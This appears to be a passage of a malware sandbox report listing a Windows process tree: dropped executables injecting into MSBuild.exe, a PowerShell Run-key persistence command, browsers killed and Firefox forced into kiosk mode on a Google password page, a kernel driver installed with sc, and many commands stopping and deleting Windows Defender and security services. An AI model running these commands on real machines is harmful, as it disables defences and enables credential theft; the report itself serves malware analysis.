        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4596,i,6050504021023749961,7182162962230942974,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4624 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:1296
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5204,i,6050504021023749961,7182162962230942974,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5188 /prefetch:8
        11⤵
        
        PID:4228
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5484,i,6050504021023749961,7182162962230942974,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5496 /prefetch:8
        11⤵
        
        PID:2960
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:1140
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        11⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:2476
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x308,0x7ffeecb0f208,0x7ffeecb0f214,0x7ffeecb0f220
        12⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1832,i,1922180946396289351,16211732271866793436,262144 --variations-seed-version --mojo-platform-channel-handle=2760 /prefetch:3
        12⤵
        
        PID:2932
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2732,i,1922180946396289351,16211732271866793436,262144 --variations-seed-version --mojo-platform-channel-handle=2724 /prefetch:2
        12⤵
        
        PID:2008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2156,i,1922180946396289351,16211732271866793436,262144 --variations-seed-version --mojo-platform-channel-handle=2768 /prefetch:8
        12⤵
        
        PID:6024
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,1922180946396289351,16211732271866793436,262144 --variations-seed-version --mojo-platform-channel-handle=3484 /prefetch:1
        12⤵
        Uses browser remote debugging
        
        PID:5448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,1922180946396289351,16211732271866793436,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:1
        12⤵
        Uses browser remote debugging
        
        PID:4544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2792,i,1922180946396289351,16211732271866793436,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:2
        12⤵
        
        PID:3300
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=4676,i,1922180946396289351,16211732271866793436,262144 --variations-seed-version --mojo-platform-channel-handle=5016 /prefetch:2
        12⤵
        
        PID:2240
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:5592
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        11⤵
        Uses browser remote debugging
        
        PID:1284
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:772
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        11⤵
        Uses browser remote debugging
        
        PID:2244
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x308,0x7ffefc76f208,0x7ffefc76f214,0x7ffefc76f220
        12⤵
        
        PID:6084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=fallback-handler --database="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --exception-pointers=86758340133056 --process=300 /prefetch:7 --thread=548
        13⤵
        
        PID:5364
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1888,i,17560585494003051251,7740442735790518213,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:3
        12⤵
        
        PID:2500
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2212,i,17560585494003051251,7740442735790518213,262144 --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:2
        12⤵
        
        PID:1152
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2484,i,17560585494003051251,7740442735790518213,262144 --variations-seed-version --mojo-platform-channel-handle=2496 /prefetch:8
        12⤵
        
        PID:5504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3428,i,17560585494003051251,7740442735790518213,262144 --variations-seed-version --mojo-platform-channel-handle=3480 /prefetch:1
        12⤵
        Uses browser remote debugging
        
        PID:3020
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3448,i,17560585494003051251,7740442735790518213,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:1
        12⤵
        Uses browser remote debugging
        
        PID:5232
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=4144,i,17560585494003051251,7740442735790518213,262144 --variations-seed-version --mojo-platform-channel-handle=1676 /prefetch:2
        12⤵
        
        PID:1040
        
        C:\ProgramData\y5ppzmgln7.exe
        
        "C:\ProgramData\y5ppzmgln7.exe"
        10⤵
        
        PID:860
        
        C:\ProgramData\xt26fcj5fu.exe
        
        "C:\ProgramData\xt26fcj5fu.exe"
        10⤵
        
        PID:2616
        
        C:\ProgramData\glx4o8qq1d.exe
        
        "C:\ProgramData\glx4o8qq1d.exe"
        10⤵
        
        PID:1976
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\lfua1" & exit
        10⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        11⤵
        Delays execution with timeout.exe
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2340
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1328
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:3572
        
        C:\Users\Admin\AppData\Local\Temp\10046340101\bf09152990.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046340101\bf09152990.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4748
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3756
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5672
        
        C:\Users\Admin\AppData\Local\Temp\10053180101\7846036ed1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053180101\7846036ed1.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1496
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053180101\7846036ed1.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\10053190101\125591ad44.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053190101\125591ad44.exe"
        8⤵
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053190101\125591ad44.exe"
        9⤵
        
        PID:3488
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3488 -s 1368
        10⤵
        Program crash
        
        PID:1480
      - C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe"
        6⤵
        Executes dropped EXE
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\onefile_3452_133884104379190644\ZSoeRVBe.exe
        
        C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2008
      - C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2532
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1564
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2000
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5676
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2472
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater_service.exe"
        11⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdater_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe\"'"
        11⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        
        PID:3264
      - C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:464
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4892
      - C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5504
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:892
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1460
      - C:\Users\Admin\AppData\Local\Temp\10476500101\0ac213fd32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476500101\0ac213fd32.exe"
        6⤵
        Suspicious use of SetThreadContext
        
        PID:2468
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3640
      - C:\Users\Admin\AppData\Local\Temp\10476510101\e379acfb2b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476510101\e379acfb2b.exe"
        6⤵
        
        PID:1988
      - C:\Users\Admin\AppData\Local\Temp\10476520101\360b757374.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476520101\360b757374.exe"
        6⤵
        
        PID:3632
      - C:\Users\Admin\AppData\Local\Temp\10476530101\186de7f713.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476530101\186de7f713.exe"
        6⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        
        PID:2132
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4564
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        Kills process with taskkill
        
        PID:4728
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        
        PID:548
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        Kills process with taskkill
        
        PID:3308
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        Kills process with taskkill
        
        PID:5128
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:3740
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        
        PID:2424
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2024 -prefsLen 27100 -prefMapHandle 2028 -prefMapSize 270279 -ipcHandle 2116 -initialChannelId {d58198e0-e8ab-4107-a7ab-cb1c42a142ee} -parentPid 2424 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2424" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:3684
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2516 -prefsLen 27136 -prefMapHandle 2520 -prefMapSize 270279 -ipcHandle 2536 -initialChannelId {a28a5914-5659-4b21-af1a-d8a5a424c446} -parentPid 2424 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2424" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:700
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3996 -prefsLen 25213 -prefMapHandle 4000 -prefMapSize 270279 -jsInitHandle 4004 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4012 -initialChannelId {c9b0cdf9-6755-4e18-be22-d4f7afcf1d1c} -parentPid 2424 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2424" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        
        PID:732
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4228 -prefsLen 27326 -prefMapHandle 4232 -prefMapSize 270279 -ipcHandle 4332 -initialChannelId {ffeabf52-b34a-4abe-b6d3-57009f454b1c} -parentPid 2424 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2424" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:4600
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4804 -prefsLen 34825 -prefMapHandle 4808 -prefMapSize 270279 -jsInitHandle 4812 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4820 -initialChannelId {f389f33c-9933-4aae-95cf-063d1c304f7e} -parentPid 2424 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2424" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        
        PID:1032
      - C:\Users\Admin\AppData\Local\Temp\10476540101\7f7237365e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10476540101\7f7237365e.exe"
        6⤵
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe"
        7⤵
        
        PID:1872
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ED11.tmp\ED12.tmp\ED13.bat C:\Users\Admin\AppData\Local\Temp\272.exe"
        8⤵
        
        PID:5356
        
        C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe" go
        9⤵
        
        PID:3452
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EEC6.tmp\EEC7.tmp\EEC8.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"
        10⤵
        
        PID:560
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:984
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:2848
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:5528
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:3604
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:4576
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2132
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2324
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:5912
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:460
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:3228
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1344
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:4508
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:6132
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5284
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:4480
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:1468
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:2012
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:4192
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:4548
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:5784
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:1828
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        
        PID:416
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:884
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:2480
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:3308
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5048
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:436
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:5908
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:1584
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:4348
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:2244
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:4900
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:1500
        
        C:\Windows\system32\reg.exe
        
